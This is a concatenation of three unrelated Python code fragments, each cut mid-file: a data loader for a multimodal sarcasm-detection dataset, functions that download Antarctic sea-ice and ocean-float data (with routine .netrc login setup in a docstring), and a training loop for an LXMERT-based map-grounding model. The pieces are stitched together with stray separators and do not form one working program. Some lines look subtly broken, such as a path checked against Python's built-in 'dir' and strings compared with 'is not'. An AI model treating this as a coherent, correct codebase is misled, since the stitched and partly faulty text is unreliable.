self.parseData(dataset_json, audio_features, video_features_file, context_video_features_file, text_bert_embeddings, context_bert_embeddings)
if config.use_target_video:
video_features_file.close()
context_video_features_file.close()
self.StratifiedKFold()
self.setupGloveDict()
# Setup speaker independent split
self.speakerIndependentSplit()
def parseData(self, json, audio_features, video_features_file=None, context_video_features_file=None, text_bert_embeddings=None, context_bert_embeddings=None):
'''
Prepares json data into lists
data_input = [ (utterance:string, speaker:string, context:list_of_strings, context_speakers:list_of_strings, utterance_audio:features ) ]
data_output = [ sarcasm_tag:int ]
'''
self.data_input, self.data_output = [], []
for idx, ID in enumerate(json.keys()):
self.data_input.append((json[ID]["utterance"], json[ID]["speaker"], json[ID]["context"],
json[ID]["context_speakers"], audio_features[ID] if audio_features else None,
json[ID]["show"]))
self.data_output.append( int(json[ID]["sarcasm"]) )
def loadContextBert(self, dataset, ):
# Prepare context video length list
length=[]
for idx, ID in enumerate(dataset.keys()):
length.append(len(dataset[ID]["context"]))
# Load BERT embeddings
with jsonlines.open(self.BERT_CONTEXT_EMBEDDINGS) as reader:
context_utterance_embeddings=[]
# Visit each context utterance
for obj in reader:
CLS_TOKEN_INDEX = 0
features = obj['features'][CLS_TOKEN_INDEX]
bert_embedding_target = []
for layer in [0,1,2,3]:
bert_embedding_target.append(np.array(features["layers"][layer]["values"]))
bert_embedding_target = np.mean(bert_embedding_target, axis=0)
context_utterance_embeddings.append(np.copy(bert_embedding_target))
# Checking whether total context features == total context sentences
assert(len(context_utterance_embeddings)== sum(length))
# Rearrange context features for each target utterance
cumulative_length = [length[0]]
cumulative_value = length[0]
for val in length[1:]:
cumulative_value+=val
cumulative_length.append(cumulative_value)
assert(len(length)==len(cumulative_length))
end_index = cumulative_length
start_index = [0]+cumulative_length[:-1]
final_context_bert_features = []
for start, end in zip(start_index, end_index):
local_features = []
for idx in range(start, end):
local_features.append(context_utterance_embeddings[idx])
final_context_bert_features.append(local_features)
return final_context_bert_features
def StratifiedKFold(self, splits=5):
'''
Prepares or loads (if existing) splits for k-fold
'''
skf = StratifiedKFold(n_splits=splits, shuffle=True)
split_indices = [(audio_train_index, audio_text_index) for audio_train_index, audio_text_index in skf.split(self.data_input, self.data_output)]
if not os.path.exists(self.INDICES_FILE):
pickle.dump(split_indices, open(self.INDICES_FILE, 'wb'), protocol=2)
def getStratifiedKFold(self):
'''
Returns train/test indices for k-folds
'''
self.split_indices = pickle_loader(self.INDICES_FILE)
return self.split_indices
def speakerIndependentSplit(self):
'''
Prepares split for speaker independent setting
Train: Fr, TGG, Sa
Test: TBBT
'''
self.train_ind_SI, self.test_ind_SI = [], []
for ind, data in enumerate(self.data_input):
if data[self.SHOW_ID] == "BBT":
self.test_ind_SI.append(ind)
else:
self.train_ind_SI.append(ind)
def getSpeakerIndependent(self):
'''
Returns the split indices of speaker independent setting
'''
return self.train_ind_SI, self.test_ind_SI
def getSplit(self, indices):
'''
Returns the split comprising of the indices
'''
data_input = [self.data_input[ind] for ind in indices]
data_output = [self.data_output[ind] for ind in indices]
return data_input, data_output
def fullDatasetVocab(self):
'''
Return the full dataset's vocabulary to filter and cache glove embedding dictionary
'''
vocab = defaultdict(lambda:0)
utterances = [instance[self.UTT_ID] for instance in self.data_input]
contexts = [instance[self.CONTEXT_ID] for instance in self.data_input]
for utterance in utterances:
clean_utt = AudioDataHelper.clean_str(utterance)
utt_words = nltk.word_tokenize(clean_utt)
for word in utt_words:
vocab[word.lower()] += 1
for context in contexts:
for c_utt in context:
clean_utt = AudioDataHelper.clean_str(c_utt)
utt_words = nltk.word_tokenize(clean_utt)
for word in utt_words:
vocab[word.lower()] += 1
return vocab
def setupGloveDict(self):
'''
Caching the glove dictionary based on all the words in the dataset.
This cache is later used to create appropriate dictionaries for each fold's training vocabulary
'''
assert(self.config.word_embedding_path is not None)
# Vocabulary of the full dataset
vocab = self.fullDatasetVocab()
if os.path.exists(self.GLOVE_DICT):
self.wordemb_dict = pickle_loader(self.GLOVE_DICT)
else:
self.wordemb_dict = {}
for line in open(self.config.word_embedding_path,'r'):
splitLine = line.split()
word = splitLine[0]
try:
embedding = np.array([float(val) for val in splitLine[1:]])
# Filter glove words based on its presence in the vocab
if word.lower() in vocab:
self.wordemb_dict[word.lower()] = embedding
except:
print("Error word in glove file (skipped): ", word)
continue
self.wordemb_dict[self.PAD_TOKEN] = np.zeros(self.config.embedding_dim)
self.wordemb_dict[self.UNK_TOKEN] = np.random.uniform(-0.25,0.25,self.config.embedding_dim)
pickle.dump(self.wordemb_dict, open(self.GLOVE_DICT, "wb"))
class AudioDataHelper:
UTT_ID = 0
SPEAKER_ID = 1
CONTEXT_ID = 2
CONTEXT_SPEAKERS_ID = 3
TARGET_AUDIO_ID = 4
TARGET_VIDEO_ID = 5
CONTEXT_VIDEO_ID = 6
TEXT_BERT_ID = 7
CONTEXT_BERT_ID = 8
PAD_ID = 0
UNK_ID = 1
PAD_TOKEN = "<PAD>"
UNK_TOKEN = "<UNK>"
GLOVE_MODELS = "./data/temp/glove_dict_{}.p"
GLOVE_MODELS_CONTEXT = "./data/temp/glove_dict_context_{}.p"
def __init__(self, audio_train_input, audio_train_output, audio_test_input, audio_test_output, config, dataLoader):
self.dataLoader = dataLoader
self.config = config
self.audio_train_input = audio_train_input
self.audio_train_output = audio_train_output
self.audio_test_input = audio_test_input
self.audio_test_output = audio_test_output
# create vocab for current split train set
self.createVocab(config.use_context)
print("vocab size: " + str(len(self.vocab)))
self.loadGloveModelForCurrentSplit(config.use_context)
self.createEmbeddingMatrix()
@staticmethod
def clean_str(string):
'''
Tokenization/string cleaning.
'''
string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string)
string = re.sub(r"\'s", " \'s", string)
string = re.sub(r"\'ve", " \'ve", string)
string = re.sub(r"n\'t", " n\'t", string)
string = re.sub(r"\'re", " \'re", string)
string = re.sub(r"\'d", " \'d", string)
string = re.sub(r"\'ll", " \'ll", string)
string = re.sub(r",", " , ", string)
string = re.sub(r"!", " ! ", string)
string = re.sub(r"\"", " \" ", string)
string = re.sub(r"\(", " ( ", string)
string = re.sub(r"\)", " ) ", string)
string = re.sub(r"\?", " ? ", string)
string = re.sub(r"\s{2,}", " ", string)
string = re.sub(r"\.", " . ", string)
string = re.sub(r".\, ", " , ", string)
string = re.sub(r"\\n", " ", string)
return string.strip().lower()
def getData(self, ID=None, mode=None, error_message=None):
if mode == "train":
return [instance[ID] for instance in self.audio_train_input]
elif mode == "test":
return [instance[ID] for instance in self.audio_test_input]
else:
print(error_message)
exit()
def createVocab(self, use_context=False):
self.vocab = vocab = defaultdict(lambda:0)
utterances = self.getData(self.UTT_ID, mode="train")
for utterance in utterances:
clean_utt = self.clean_str(utterance)
utt_words = nltk.word_tokenize(clean_utt)
for word in utt_words:
vocab[word.lower()] += 1
# Add vocabulary fron context sentences of train split if context is used
if use_context:
context_utterances = self.getData(self.CONTEXT_ID, mode="train")
for context in context_utterances:
for c_utt in context:
clean_utt = self.clean_str(c_utt)
utt_words = nltk.word_tokenize(clean_utt)
for word in utt_words:
vocab[word.lower()] += 1
def loadGloveModelForCurrentSplit(self, use_context=False):
'''
Loads the Glove pre-trained model for the current split
'''
print("Loading glove model")
# if model already exists:
filename = self.GLOVE_MODELS_CONTEXT if use_context else self.GLOVE_MODELS
filename = filename.format(self.config.fold)
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
if os.path.exists(filename):
self.model = pickle_loader(filename)
self.embed_dim = len(self.dataLoader.wordemb_dict[self.PAD_TOKEN])
else:
self.model = model = {}
self.embed_dim = 0
# Further filter glove dict words to contain only train set vocab for current fold
for word, embedding in self.dataLoader.wordemb_dict.items():
if word in self.vocab: model[word.lower()] = embedding
self.embed_dim = len(embedding)
pickle.dump(self.model, open(filename, "wb"), protocol=2)
def createEmbeddingMatrix(self):
"""
Get word matrix. W[i] is the vector for word indexed by i
also creates word_idx_map : to map all words to proper index of i for associated
embedding matrix W
"""
vocab_size = len(self.model) # length of filtered glove embedding words
self.word_idx_map = word_idx_map = dict()
self.W = W = np.zeros(shape=(vocab_size+2, self.embed_dim), dtype='float32')
# Pad and Unknown
W[self.PAD_ID] = self.dataLoader.wordemb_dict[self.PAD_TOKEN]
W[self.UNK_ID] = self.dataLoader.wordemb_dict[self.UNK_TOKEN]
word_idx_map[self.PAD_TOKEN] = self.PAD_ID
word_idx_map[self.UNK_TOKEN] = self.UNK_ID
# Other words
i = 2
for word in self.model:
if (word != self.PAD_TOKEN) and (word != self.UNK_TOKEN):
W[i] = np.copy(self.model[word])
word_idx_map[word] = i
i += 1
# Make words not in glove as unknown
for word in self.vocab:
if word not in self.model:
word_idx_map[word] = self.UNK_ID
def getEmbeddingMatrix(self):
return self.W
def wordToIndex(self, utterance):
word_indices = [self.word_idx_map.get(word, self.UNK_ID) for word in nltk.word_tokenize(self.clean_str(utterance))]
#padding to max_sent_length
word_indices = word_indices[:self.config.max_sent_length]
word_indices = word_indices + [self.PAD_ID]*(self.config.max_sent_length - len(word_indices))
assert(len(word_indices) == self.config.max_sent_length)
return word_indices
def getTargetBertFeatures(self, mode=None):
utterances = self.getData(self.TEXT_BERT_ID, mode,
"Set mode properly for vectorizeUtterance method() : mode = train/test")
return utterances
def getContextBertFeatures(self, mode=None):
utterances = self.getData(self.CONTEXT_BERT_ID, mode,
"Set mode properly for vectorizeUtterance method() : mode = train/test")
mean_features=[]
for utt in utterances:
mean_features.append(np.mean(utt, axis=0))
return np.array(mean_features)
def vectorizeUtterance(self, mode=None):
utterances = self.getData(self.UTT_ID, mode,
"Set mode properly for vectorizeUtterance method() : mode = train/test")
vector_utt | |
SOCCOM float profiles in text format from FloatViz FTP server.
Args:
save_to_root: path of main Argo data directory of interest
"""
save_to_floats = save_to_root + 'SOCCOM_HiResQC_ftp_' + datetime.today().strftime('%Y-%m-%d') + '/'
os.mkdir(save_to_floats)
ftp_root = 'ftp.mbari.org'
url_root = 'pub/SOCCOM/FloatVizData/HRQC/'
df.all_files(ftp_root,url_root,save_to_floats,overwrite=overwrite_profs)
# do a find-and-replace on data files to remove whitespace between some column names
for data_filename in os.listdir(save_to_floats):
orig_file_as_list = codecs.open(save_to_floats + data_filename,'rb',encoding='latin-1').readlines()
new_file_as_list = []
for line in orig_file_as_list:
first_edit = line.replace('Lon [°E]', 'Lon[°E]')
second_edit = first_edit.replace('Lat [°N]', 'Lat[°N]')
new_file_as_list.append(second_edit)
out_file = codecs.open(save_to_floats + data_filename,'wb',encoding='latin-1')
out_file.writelines(new_file_as_list)
out_file.close()
def amsr(which_amsr, start_date, end_date, save_to, get_pdfs=True, overwrite=False, convert=False, conversion_script_dir=None):
""" Downloads AMSR-E or AMSR2 sea ice concentration product.
Converts data from HDF4 to HDF5 format by calling df.convert_to_hdf5() if 'convert'
is True, then deletes original HDF4 file.
AMSR-2:
AMSR2 6.25 km daily sea ice concentration product is ARTIST Sea Ice (ASI)
algorithm from 89 GHz channel, a preliminary data product that uses the
AMSR-E calibrations. Consider switching to JAXA GCOM-W1 AMSR2 sea ice
product when "research" calibrated version becomes available, or NSIDC
DAAC validated versions (supposedly in late 2016).
Example file path: http://www.iup.uni-bremen.de:8084/amsr2data/asi_daygrid_swath/s6250/2015/aug/Antarctic/asi-AMSR2-s6250-20150801-v5.hdf
Note that 3.125 km gridded ARTIST AMSR2 is available from the following
link, but the lower 6.25 km resolution is used here for consistency with
AMSR-E products: ftp://ftp-projects.zmaw.de/seaice/AMSR2/
AMSR-E:
AMSR-E 6.25 km daily sea ice concentration product is ARTIST Sea Ice (ASI)
algorithm from 89 GHz channel.
Example file path: http://iup.physik.uni-bremen.de:8084/amsredata/asi_daygrid_swath/l1a/s6250/2011/oct/Antarctic/asi-s6250-20111004-v5.hdf
Another option for AMSR-E is the 12.5 km v3 NSIDC product available here:
http://nsidc.org/data/AE_SI12
It seems that the 6.25 km ASI product is also available at the following link,
but no 3.125 km product is available: ftp://ftp-projects.zmaw.de/seaice/AMSR-E_ASI_IceConc/
SSMIS product from University of Bremen on 6.25 km grid to bridge gap between AMSR-E and AMSR2:
SSMIS interim: http://iup.physik.uni-bremen.de:8084/ssmisdata/asi_daygrid_swath/s6250/
Required data acknowledgement: Spreen et al. (2008), doi:10.1029/2005JC003384
Optional data acknowledgement (for AMSR2): Beitsch et al. (2014), doi:10.3390/rs6053841
Args:
which_amsr: if 1, download AMSR-E; if 2, download AMSR2
start_date and end_date: (Y,M,D), with start/end inclusive
save_to: directory path
get_pdfs: download image files
Returns:
None
Raises:
No handled exceptions
"""
if which_amsr == 2:
url_part1 = 'http://www.iup.uni-bremen.de:8084/amsr2data/asi_daygrid_swath/s6250/'
url_part2 = '/Antarctic/'
filename_part1 = 'asi-AMSR2-s6250-'
filename_part2 = '-v5.hdf'
elif which_amsr == 1:
url_part1 = 'http://iup.physik.uni-bremen.de:8084/amsredata/asi_daygrid_swath/l1a/s6250/'
url_part2 = '/Antarctic/'
filename_part1 = 'asi-s6250-'
filename_part2 = '-v5.hdf'
filename_part2_pdf1 = '-v5_nic.pdf'
filename_part2_pdf2 = '-v5_visual.pdf'
months = ['jan','feb','mar','apr','may','jun','jul','aug','sep','oct','nov','dec']
starting_dir = os.getcwd()
os.chdir(save_to)
existing_files = os.listdir()
os.chdir(starting_dir)
all_dates = tt.dates_in_range(start_date, end_date)
for index, d in enumerate(all_dates):
url_dir = url_part1 + str(d[0]) + '/' + months[d[1]-1] + url_part2
filename = filename_part1 + '{0[0]}{0[1]:02d}{0[2]:02d}'.format(d) + filename_part2
new_filename = filename.split('.')[0] + '.h5'
if (new_filename not in existing_files) or (new_filename in existing_files and overwrite is True):
df.single_file(url_dir, filename, save_to, overwrite)
if convert:
df.convert_to_hdf5(conversion_script_dir, filename, save_to, save_to, overwrite=overwrite, delete_original=True)
if get_pdfs:
pdf1name = filename_part1 + '{0[0]}{0[1]:02d}{0[2]:02d}'.format(d) + filename_part2_pdf1
pdf2name = filename_part1 + '{0[0]}{0[1]:02d}{0[2]:02d}'.format(d) + filename_part2_pdf2
df.single_file(url_dir, pdf1name, save_to, overwrite)
df.single_file(url_dir, pdf2name, save_to, overwrite)
df.how_far(index,all_dates,0.01)
def dmsp_nrt(start_date, end_date, save_to, overwrite=False):
""" Downloads NSIDC 25 km preliminary Near Real-Time (NRT) sea ice concentration product.
NSIDC's v1 daily SSMIS product on 25 km grid in netCDF-4 (HDF5) format. Product derived from 3 channels. Data files
contain the following:
- NRT CDR (Climate Data Record) product based on DMSP SSMIS currently from 2016-01-01 to present, using purely
automated application and merging of the NASA Team (NT) and Bootstrap (BT) algorithms.
(The NRT product does not contain Goddard Merged fields.)
Information: https://nsidc.org/data/g10016
Example file path: ftp://sidads.colorado.edu/pub/DATASETS/NOAA/G10016/south/daily/2016/seaice_conc_daily_icdr_sh_f17_20160101_v01r00.nc
Expert guidance on the related CDR record:
https://climatedataguide.ucar.edu/climate-data/sea-ice-concentration-noaansidc-climate-data-record
Required data acknowledgement given in full under 'Citing This Data' here: http://dx.doi.org/10.7265/N5FF3QJ6.
"""
ftp_root = 'sidads.colorado.edu'
url_root = 'pub/DATASETS/NOAA/G10016/south/daily/'
filename_part1 = 'seaice_conc_daily_icdr_sh_'
filename_part2 = '_v01r00.nc'
sat_abbrevs = ['f17','f18']
sat_start_dates = [(2016,1,1),(2016,4,1)]
sat_end_dates = [(2016,3,30),tt.now()]
all_dates = tt.dates_in_range(start_date, end_date)
for index, d in enumerate(all_dates):
if not tt.is_time_in_range(sat_start_dates[0],sat_end_dates[-1],d):
raise ValueError('Given date range exceeds hard-coded satellite date ranges.')
for sat in range(0,len(sat_abbrevs)):
if tt.is_time_in_range(sat_start_dates[sat], sat_end_dates[sat], d):
sat_abbrev = sat_abbrevs[sat]
filename = filename_part1 + sat_abbrev + '_' + '{0[0]}{0[1]:02d}{0[2]:02d}'.format(d) + filename_part2
starting_dir = os.getcwd()
try:
if starting_dir is not save_to:
os.chdir(save_to)
if filename not in os.listdir() or (filename in os.listdir() and overwrite is True):
df.single_file(url_root + '{0[0]}/'.format(d), filename, save_to, ftp_root=ftp_root, overwrite=False, auth=None)
finally:
os.chdir(starting_dir)
df.how_far(index, all_dates, 0.1)
def dmsp_v3(start_date, end_date, save_to, overwrite=False):
""" Downloads NSIDC 25 km sea ice concentration product.
NSIDC's v3 r1 daily SMMR + SSM/I + SSMIS product on 25 km grid in netCDF-4 (HDF5) format. Product derived from
3 channels. Data files contain the following:
- CDR (Climate Data Record) product based on DMSP SSM/I and SSMIS from 1987-07-09 onwards, using purely automated
application and merging of the NASA Team (NT) and Bootstrap (BT) algorithms.
- GSFC (NASA Goddard Space Flight Center) merged product based on the above, plus Nimbus-7 SMMR from 1978-11-01
onwards (every other day). Some manual quality control, interpolation, and editing has been conducted (but without
provenance), meaning that GSFC is a higher-quality but less uniform record than CDR. In any case, CDR excludes
the SMMR period (as of now) due to "data quality issues of the input brightness temperatures" but also
because "full provenance and documentation of the SMMR brightness temperatures and processing methodology
... cannot be assured."
Information: https://nsidc.org/data/g02202
Example file path: ftp://sidads.colorado.edu/pub/DATASETS/NOAA/G02202_V3/south/daily/1978/seaice_conc_daily_sh_n07_19781101_v03r01.nc
Expert guidance on these records:
https://climatedataguide.ucar.edu/climate-data/sea-ice-concentration-noaansidc-climate-data-record
Required data acknowledgement given in full under 'Citing This Data' here: http://dx.doi.org/10.7265/N59P2ZTG.
"""
ftp_root = 'sidads.colorado.edu'
url_root = 'pub/DATASETS/NOAA/G02202_V3/south/daily/'
filename_part1 = 'seaice_conc_daily_sh_'
filename_part2 = '_v03r01.nc'
sat_abbrevs = ['n07','f08','f11','f13','f17']
sat_start_dates = [(1978,11,1),(1987,7,9),(1991,12,3),(1995,10,1),(2008,1,1)]
sat_end_dates = [(1987,7,8),(1991,12,2),(1995,9,30),(2007,12,31),(2017,12,31)]
all_dates = tt.dates_in_range(start_date, end_date)
starting_dir = os.getcwd()
if starting_dir is not save_to:
os.chdir(save_to)
dir_contents = os.listdir()
for index, d in enumerate(all_dates):
print(d) ### FOR TESTING
if not tt.is_time_in_range(sat_start_dates[0],sat_end_dates[-1],d):
raise ValueError('Given date range exceeds hard-coded satellite date ranges.')
for sat in range(0,len(sat_abbrevs)):
if tt.is_time_in_range(sat_start_dates[sat], sat_end_dates[sat], d):
sat_abbrev = sat_abbrevs[sat]
filename = filename_part1 + sat_abbrev + '_' + '{0[0]}{0[1]:02d}{0[2]:02d}'.format(d) + filename_part2
if filename not in dir_contents or (filename in dir_contents and overwrite is True):
# if tt.is_time_in_range((1986,9,25),(1987,1,1),d): # misplaced files -- but fixed now
# df.single_file(url_root + '1987/',filename,save_to,ftp_root=ftp_root,
# overwrite=False,auth=None)
df.single_file(url_root + '{0[0]}/'.format(d), filename, save_to, ftp_root=ftp_root,
overwrite=False, auth=None)
df.how_far(index, all_dates, 0.1)
os.chdir(starting_dir)
def nimbus5(start_date, end_date, save_to, convert=False, conversion_script_dir=None):
""" Downloads Nimbus-5 sea ice concentration product.
Unzips files first. Converts data from HDF4 to HDF5 format by calling df.convert_to_hdf5()
if 'convert' is True, then deletes original HDF4 file.
NSIDC's v1 Nimbus-5 daily ESMR product on 25 km grid in compressed HDF4 format. Product based on
a single channel (19 GHz), which is less accurate than SMMR and SSM/I products from after 1976.
Information: http://nsidc.org/data/NSIDC-0009
IMPORTANT NOTE: Downloading batch data via HTTPS requires login to EarthData. To do this, one must create an
account: https://urs.earthdata.nasa.gov/users/new
... and then create a .netrc file via the command line using the following process:
cd $HOME
rm -f .netrc
touch .netrc
echo 'machine urs.earthdata.nasa.gov login [USERNAME] password [PASSWORD]' >> .netrc
note: replace with your username and password
chmod 0600 .netrc
Example file path: https://daacdata.apps.nsidc.org/pub/DATASETS/nsidc0009_esmr_seaice/south/daily00/ESMR-1972346.tse.00.gz
Required data acknowledgement given in full here: http://dx.doi.org/10.5067/W2PKTWMTY0TP.
"""
url_dir = 'https://daacdata.apps.nsidc.org/pub/DATASETS/nsidc0009_esmr_seaice/south/daily00/'
filename_part1 = 'ESMR-'
filename_part2 = '.tse.00.gz'
filename_part2_uncompressed = '.tse.00.hdf'
filename_part2_uncompressed_converted = '.tse.00.h5'
all_dates = tt.dates_in_range(start_date, end_date)
for index, d in enumerate(all_dates):
date_365 = tt.convert_date_to_365(d)
filename = filename_part1 + '{0[0]}{1:03d}'.format(d,date_365) + filename_part2
intermediate_filename = filename_part1 + '{0[0]}{1:03d}'.format(d, date_365) + filename_part2_uncompressed
new_filename = filename_part1 + '{0[0]}{1:03d}'.format(d,date_365) + filename_part2_uncompressed_converted
starting_dir = os.getcwd()
try:
if starting_dir is not dir:
os.chdir(save_to)
if new_filename not in os.listdir():
df.single_file(url_dir, filename, save_to, overwrite=False, auth=None)
df.un_gzip(save_to, filename, append_extension='.hdf', remove_compressed_file=True)
df.convert_to_hdf5(conversion_script_dir, intermediate_filename, save_to, save_to, overwrite=False,delete_original=True)
finally:
os.chdir(starting_dir)
df.how_far(index, all_dates, 0.1)
def ecmwf(date_range='1979-01-01/to/2017-08-31',area='-40/-90/-90/90',type='an',step='0',time='00/06/12/18',
params=['msl','t2m','skt'],output_filename=None):
""" Submits MARS request to retrieve ERA-Interim reanalysis fields as netCDF file.
Arguments:
date_range: for daily fields, format as, e.g., '1979-01-01/to/2017-08-31'
for monthly means of daily means, use [datetime(start_yr,start_mo,1),datetime(end_yr,end_mo,1)]
area: subsetting area, format '-40/-90/-90/90' (N/W/S/E)
type: 'an' for analysis or 'fc' for forecast
step: '0' for analysis only, '6/12' or '3/6/9/12' for 6-hourly or 3-hourly forecasts from 0000 and 1200 UTC
or None for monthly means (regardless, it will be | |
<reponame>marioskatsak/lxmert<filename>src/tasks/rosmi_backup.py
# coding=utf-8
# Copyleft 2019 project LXRT.
import os, time
import collections
import torch, json
import torch.nn as nn
import numpy as np
import difflib
from torch.autograd import Variable
from torch.utils.data.dataloader import DataLoader
from tqdm import tqdm
# from datasketch import MinHash, MinHashLSHForest, MinHashLSH
from elasticsearch import Elasticsearch
from param import args
from pretrain.qa_answer_table import load_lxmert_qa
from tasks.rosmi_model import ROSMIModel
from tasks.rosmi_data import ROSMIDataset, ROSMITorchDataset, ROSMIEvaluator,RENCIDataset, RENCITorchDataset, RENCIEvaluator
from torch.utils.tensorboard import SummaryWriter
from utils import iou_loss, giou_loss, elastic_prediction
from torch.optim.lr_scheduler import ReduceLROnPlateau
from lxrt.entry import convert_sents_to_features
from lxrt.tokenization import BertTokenizer
import spacy
nlp = spacy.load("en_core_web_md")
DataTuple = collections.namedtuple("DataTuple", 'dataset loader evaluator')
MAX_SENT_LENGTH = 25
def get_data_tuple(splits: str, bs:int, shuffle=False, drop_last=False) -> DataTuple:
dset = ROSMIDataset(splits)
tset = ROSMITorchDataset(dset)
evaluator = ROSMIEvaluator(dset)
data_loader = DataLoader(
tset, batch_size=bs,
shuffle=shuffle, num_workers=args.num_workers,
drop_last=drop_last, pin_memory=True
)
return DataTuple(dataset=dset, loader=data_loader, evaluator=evaluator)
def get_renci_data_tuple(splits: str, bs:int, shuffle=False, drop_last=False) -> DataTuple:
dset = RENCIDataset(splits)
tset = RENCITorchDataset(dset)
evaluator = RENCIEvaluator(dset)
data_loader = DataLoader(
tset, batch_size=bs,
shuffle=shuffle, num_workers=args.num_workers,
drop_last=drop_last, pin_memory=True
)
return DataTuple(dataset=dset, loader=data_loader, evaluator=evaluator)
class ROSMI:
def __init__(self,get_data_tuple):
# Datasets
self.train_tuple = get_data_tuple(
args.train, bs=args.batch_size, shuffle=True, drop_last=True
)
if args.valid != "":
self.valid_tuple = get_data_tuple(
args.valid, bs=args.batch_size,
shuffle=False, drop_last=False
)
else:
self.valid_tuple = None
if args.test:
self.test_tuple = get_data_tuple(
args.test, bs=args.batch_size,
shuffle=False, drop_last=False
)
else:
self.test_tuple = None
self.writer = SummaryWriter(f'snap/rosmi/logging_rosmi_{args.n_ent}_names/{os.uname()[1]}.{time.time()}')
# Model
self.model = ROSMIModel(self.train_tuple.dataset.num_bearings)
# Load pre-trained weights
if args.load_lxmert is not None:
self.model.lxrt_encoder.load(args.load_lxmert)
if args.load_lxmert_qa is not None:
load_lxmert_qa(args.load_lxmert_qa, self.model,
label2ans=self.train_tuple.dataset.label2ans)
# GPU options
self.model = self.model.cuda()
if args.multiGPU:
self.model.lxrt_encoder.multi_gpu()
# Loss and Optimizer
self.bce_loss = nn.BCEWithLogitsLoss()
self.cross_loss = nn.CrossEntropyLoss()
self.mse_loss = nn.SmoothL1Loss()
if 'bert' in args.optim:
# input("bert")
batch_per_epoch = len(self.train_tuple.loader)
t_total = int(batch_per_epoch * args.epochs)
# t_total = -1
# batch 24 when 20 and epochs 3000 = 72000
# input(int(batch_per_epoch * args.epochs))
# t_total = 72000
print("BertAdam Total Iters: %d" % t_total)
from lxrt.optimization import BertAdam
self.optim = BertAdam(list(self.model.parameters()),
lr=args.lr,
warmup=0.1,
t_total=t_total)
else:
self.optim = args.optimizer(self.model.parameters(), args.lr)
# input("AdamW")
# self.optim = torch.optim.AdamW(self.model.parameters(), args.lr, weight_decay=0.1,amsgrad=True)
# self.scheduler = ReduceLROnPlateau(self.optim, 'min')
# Output Directory
self.output = args.output
os.makedirs(self.output, exist_ok=True)
def train(self, train_tuple, eval_tuple):
dset, loader, evaluator = train_tuple
iter_wrapper = (lambda x: tqdm(x, total=len(loader))) if args.tqdm else (lambda x: x)
# self.writer.add_graph(self.model,loader)
# self.writer.close()
best_valid = 0.
best_train = 0.
best_acc2 = 0.
best_tacc = 0
best_acc3 = 0
best_test_acc = 0
best_mDist = [99999,99999,99999,99999]
best_testDist = [99999,99999,99999,99999]
n_iter = 0
for epoch in tqdm(range(args.epochs)):
sentid2ans = {}
for i, (sent_id, feats, feat_mask, boxes, names, sent, dists, diste, land_, cland_, bear_ ,l_start,l_end, target) in iter_wrapper(enumerate(loader)):
total_loss = 0
# input("lol")
self.model.train()
self.optim.zero_grad()
# print(feats.shape)
# print(names[0].squeeze(2).cuda())
# print(names[1].shape)
# input(names[2].shape)
if args.n_ent:
names = (names[0].squeeze(2).cuda(), \
names[1].squeeze(2).cuda(), \
names[2].squeeze(2).cuda())
elif args.qa:
names = (names[0].cuda(), \
names[1].cuda(), \
names[2].cuda())
else:
names = None
feats, feat_mask, boxes, target, dists, diste, land_, cland_, bear_, l_start, l_end = feats.cuda(), feat_mask.cuda(), boxes.cuda(), target.cuda(), dists.cuda(), diste.cuda(), \
land_.cuda(), cland_.cuda(), bear_.cuda(), l_start.cuda(), l_end.cuda()
logit, auxilaries = self.model(feats.float(), feat_mask.float(), boxes.float(), names, sent)
# print(names.shape)
# input(sent.shape)
# print(type(sent))
# if i == 0:
#
# # input(sent)
# # input(len(sent))
# tmpInd = torch.ones(len(sent),MAX_VQA_LENGTH)
# tmpNames = torch.ones(len(sent),MAX_VQA_LENGTH)
# # print(type(tmpInd))
# # print(type(tmpNames))
# # input(sent)
# # input(type(names))
# self.writer.add_graph(self.model, (feats.float(), feat_mask.float(), boxes.float(),names,tmpInd ))
# assert logit.dim() == target.dim() == 2
# target_loss = self.mse_loss(logit, target)
# self.writer.add_scalar('target loss', target_loss, n_iter)
# total_loss += target_loss*logit.size(1)*4
# print(logit.size(1))
# print(target)
# total_loss += iou_loss(logit, target)
# iou,loss2 = giou_loss(logit, target)
# self.writer.add_scalar('giou loss', loss2, n_iter)
# total_loss += loss2
p_dist_s, p_dist_e, p_land, p_cland, p_bear, p_start, p_end = auxilaries
assert logit.dim() == target.dim() == 2
bear_loss = self.bce_loss(p_bear,bear_.float())
self.writer.add_scalar('Bearing loss', bear_loss, n_iter)
total_loss += bear_loss* p_bear.size(1) * 2
dists_loss = self.bce_loss(p_dist_s,dists.float())
self.writer.add_scalar('distance Start loss', dists_loss, n_iter)
total_loss += dists_loss* p_dist_s.size(1) * 2
diste_loss = self.bce_loss(p_dist_e,diste.float())
self.writer.add_scalar('distance End loss', diste_loss, n_iter)
total_loss += diste_loss* p_dist_e.size(1) * 2
p_start_loss = self.bce_loss(p_start,l_start.float())
total_loss += p_start_loss* p_start.size(1) * 2
p_end_loss = self.bce_loss(p_end,l_end.float())
total_loss += p_end_loss* p_end.size(1) * 2
# print(p_cland)
# print(cland_)
# print(p_cland.shape)
# input(cland_.shape)
if args.qa:
cland_loss = self.bce_loss(p_start,l_start) + self.bce_loss(p_end,l_end)
total_loss += cland_loss* p_start.size(1) * 2
else:
cland_loss = self.bce_loss(p_cland,cland_)
self.writer.add_scalar('Cls Landmark loss', cland_loss, n_iter)
total_loss += cland_loss* p_cland.size(1) * 4
# total_loss /=4
# loss += self.mse_loss(p_dist,dist.float())#*p_dist.size(1)
# print(land_)
# input(land_.float())
# land_loss = self.mse_loss(p_land,land_.float())#*p_land.size(1)
# self.writer.add_scalar('landmark loss', land_loss, n_iter)
# total_loss += land_loss*p_land.size(1)
# total_loss += self.mse_loss(p_bear,bear_.float())#*p_bear.size(1)
# print(p_dist,torch.Tensor([[int(di)]for di in dist]))
# input(total_loss)
# if not total_loss:
# print("Not ready yet")
# total_loss = self.mse_loss(logit, target)
# print(loss)
# print(loss2)
# if land_loss < 50 and diste_loss < 0.01:
#
# total_loss += self.mse_loss(logit, target)*logit.size(1)
# total_loss = loss + loss2
# else:
# total_loss = loss2
# total_loss = loss + loss2
self.writer.add_scalar('total loss', total_loss, n_iter)
# print(loss)
total_loss.backward()
nn.utils.clip_grad_norm_(self.model.parameters(), 5.)
self.optim.step()
label = logit
# input(logit)
bear_score, bear_label = p_bear.max(1)
# if args.qa:
_, p_start = p_start.max(1)
_, p_end = p_end.max(1)
_, p_cland = p_cland.max(1)
_, dist_e = p_dist_e.max(1)
